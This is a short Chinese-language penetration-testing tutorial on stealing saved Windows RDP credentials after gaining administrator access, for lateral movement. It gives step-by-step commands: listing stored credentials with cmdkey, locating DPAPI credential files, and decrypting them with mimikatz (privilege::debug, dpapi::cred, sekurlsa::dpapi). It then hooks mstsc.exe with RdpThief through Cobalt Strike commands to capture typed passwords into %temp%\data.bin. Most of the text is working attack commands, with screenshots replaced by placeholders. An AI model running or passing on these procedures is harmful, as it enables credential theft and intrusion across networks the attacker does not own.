RDP凭据

0x00 简介

就是利用RDP协议远程连接其他机器的密码。

image

0x01 获取保存的RDP凭据

在获取一台机器管理员权限后，可以查看本地是否保存了 RDP 密码，然后解密尝试用于横向。

查看保存的远程主机信息（该命令需要在用户 session 下执行）

cmdkey /list

image

1. Mimikatz

本地的凭据

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image

选择一个开始进行解密，这里需要记录 guidMasterKey

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\{用户名}\AppData\Local\Microsoft\Credentials\{session}"

image

找到对应的 Masterkey

sekurlsa::dpapi

image

用密钥来进行解密指定的凭据，成功解出密码

dpapi::cred /in:C:\Users\{用户名}\AppData\Local\Microsoft\Credentials\{session} /masterkey:{masterkey}

image

后面，懂得都懂

2. Netpass.exe

界面化工具

image

0x02 HOOK RDP 凭据

直接用工具，原理建议看 作者原文

启动心跳检测，检查新的mstsc.exe进程，执行注入操作

rdpthief_enable

image

模拟管理员进行远程登录

image

停止心跳检测

rdpthief_disable

查看结果

rdpthief_dump

我的cs有点奇怪。。。。

image

还是导出来看吧，在 %temp%\data.bin 里

image.png

参考文献

获取rdp凭据
rdp_thief